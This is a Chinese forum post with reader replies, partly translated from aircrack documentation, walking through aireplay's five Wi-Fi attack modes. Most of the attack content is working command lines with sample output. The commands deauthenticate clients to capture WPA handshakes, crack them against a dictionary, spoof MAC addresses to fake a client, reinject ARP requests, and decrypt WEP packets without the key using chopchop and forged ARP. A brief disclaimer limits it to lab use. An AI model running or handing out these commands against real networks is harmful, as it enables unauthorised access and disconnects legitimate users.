!破解关键!aireplay详述!!
<p>本文大部分翻译自aircrackpack的作者,仅在实验室环境中测试,请勿用于非法尝试。</p><p>有一定经验的人,应该知道aireplay在破解中所起的作用。</p><p>如果你在实验中屡屡受挫,下面的内容应对你有用。</p><p>aireplay有5种攻击模式,对应于不同情况。下面一一说来:</p><p></p><p> 在下面的例子中,00:13:10:30:24:9C 是AP(无线路由) 的MAC 地址(on channel 6), 00:09:5B:EB:C5:2B 是客户的MAC address</p><p> + Attack 0: deauthentication</p><p> 这种攻击模式强制断开客户端与路由端的连接,使其重新连接,在此期间,可以捕获WAP 的handshakes,以及WEP的有效ivs,并产生有效ARP攻击(配合-3攻击)。这在实践中是非常有效的。如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3(见下面具体内容)也无法产生有效ARP攻击。如果在-3的同时,另外进行-0 攻击,-3攻击会被立刻激活。</p><p> 显而易见,如果没有客户端是不成的。</p><p> Some examples:</p><p> o WPA Handshake capture with an Atheros</p><p> airmon.sh start ath0<br/> airodump ath0 out 6(switch to another console)<br/> aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0<br/> (wait for a few seconds)<br/> aircrack -w /path/to/dictionary out.cap</p><p> o ARP request generation with a Prism2 card</p><p> airmon.sh start wlan0<br/> airodump wlan0 out 6(switch to another console)<br/> aireplay -0 5 -a 00:13:10:30:24:9C wlan0<br/> aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0</p><p> aireplay -0 5 ------进行五次攻击,如果为0,则循环攻击,客户端无法正常上网,不停的断开连接。</p><p> -a 后是路由的mac地址。可以加 -h 后为攻击的客户端的mac地址,也可以不加。</p><p> wlan0 为自己的网卡名。用ifconfig -a 看,也可以是wifi0,ath1等等。有很多帖子都有叙述,这里就不再多说了。</p><p> + Attack 1: fake authentication</p><p> 这种攻击在没有合法客户端与路由相连时有些用处,这里我们伪装了一个客户端并使之育路由连接。这个操作可以配合 -3 (ARP request reinjection)和 -4 ("chopchop" WEP decryption).使用。如果,有客户端,则针对客户端使用-3 或 -4 更为有效。</p><p> 实际上,如果没有客户端的话,这种攻击很可能没有效果。 </p><p> aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0<br/> 12:14:06Sending Authentication Request<br/> 12:14:06Authentication successful<br/> 12:14:06Sending Association Request<br/> 12:14:07Association successful :-)</p><p> +---------------------------------------------------------------------+<br/> | With patched madwifi CVS 2005-08-14, it's possible to inject |<br/> | packets while in Managed mode (the WEP key itself doesn't matter, |<br/> | as long as the AP accepts Open-System authentication). So, instead|<br/> | of running attack 1, you may just associate and inject / monitor |<br/> | through the athXraw interface: |<br/> | |<br/> | ifconfig ath0 down hw ether 00:10:20:30:40:50 |<br/> | iwconfig ath0 mode Managed essid myap key AAAAAAAAAA |<br/> | ifconfig ath0 up |<br/> | |<br/> | sysctl -w dev.ath0.rawdev=1 |<br/> | ifconfig ath0raw up |<br/> | airodump ath0raw out 6 |<br/> | |<br/> | Then you can run attack 3 or 4 (aireplay will automatically replace |<br/> | ath0 with ath0raw below): |<br/> | |<br/> | aireplay -3 -h 00:10:20:30:40:50 -b 00:13:10:30:24:9C ath0 |<br/> | aireplay -4 -h 00:10:20:30:40:50 -f 1 ath0 |<br/> | |<br/> +---------------------------------------------------------------------+</p><p> Some access points require to reassociate every 30 seconds, otherwise<br/> our fake client is considered disconnected. In this case, setup the<br/> periodic re-association delay:</p><p> aireplay -1 30 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0</p><p><br/></p><p> + Attack 2: interactive packet replay</p><p> 这种攻击模式几本无用,只是某些时候做测试用。</p><p> aireplay -2 -f 0 -t 1 -d FF:FF:FF:FF:FF:FF -n 90 ath0</p><p> + Attack 3: ARP-request reinjection</p><p> 这种攻击模式是最为有效的。这里你既可以利用合法客户端,也可以配合-1 利用伪装客户端。一般情况下,你需要等几分钟直到出现有效ARP request. 如果没有任何通信存在,则这种攻击就会失败。在实践中,如果合法客户端和路由之间长时间内没有ARP request,可以尝试同时使用-0 攻击。</p><p> Please note that you can also reuse ARP requests from a previous<br/> capture using the -r switch.</p><p> aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0<br/> Saving ARP requests in replay_arp-0627-121526.cap<br/> You must also start airodump to capture replies.<br/> Read 2493 packets (got 1 ARP requests), sent 1305 packets...</p><p> + Attack 4: KoreK's "chopchop" (CRC prediction)</p><p> 这种攻击模式不常用,但是一旦成果,则可以在不知道密码的情况下破解WEP包。</p><p> This attack, when successful, can decrypt a WEP data packet without<br/> knowing the key. It can even work against dynamic WEP. This attack does<br/> not recover the WEP key itself, but merely reveals the plaintext.<br/> However, most access points are not vulnerable at all. Some may seem<br/> vulnerable at first but actually drop data packets shorter that 60<br/> bytes. This attack requires at least one WEP data packet.</p><p> 1. First, we decrypt one packet :</p><p> aireplay -4 -h 00:09:5B:EB:C5:2B ath0</p><p> 2. Let's have a look at the IP address :</p><p> tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap<br/> reading from file replay_dec-0627-022301.cap, link-type [...]<br/> IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1</p><p> 3. Then, forge an ARP request.</p><p> The source IP (192.168.1.100) doesn't matter, but the destination<br/> IP (192.168.1.2) must respond to ARP requests. The source MAC must<br/> belong to an associated station.</p><p> ./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \<br/> 00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap</p><p> 4. And replay our forged ARP request :</p><p> aireplay -2 -r arp.cap ath0<br/></p><p>————————————————————————<br/><font color="#ff0000">去除回复可见,并加此贴为精华。Tange/2008.6.4</font></p>
[此贴子已经被tange于2008-6-4 23:22:40编辑过] :)俺破自家的 wep, 破的 莫明其妙~~ :) 看看学习先! <p>需要学习!我要看</p> 这个好啊~!哈哈哈~~!有用 谢谢看看学习下<br/> <p>学习下<br/></p> 一定要好好学习一下!!! <div style="FLOAT: left;"><img alt="发贴心情" src="http://forum.anywlan.com/skins/Default/topicface/face1.gif"/></div><div id="textstyle_50322" style="FONT-SIZE: 10pt;">谢谢 学习下<br/></div> <p>一定要学习一下哦!!</p> 新手学习,各高手致敬!<br/> 呵呵,要人气固然是很重要的!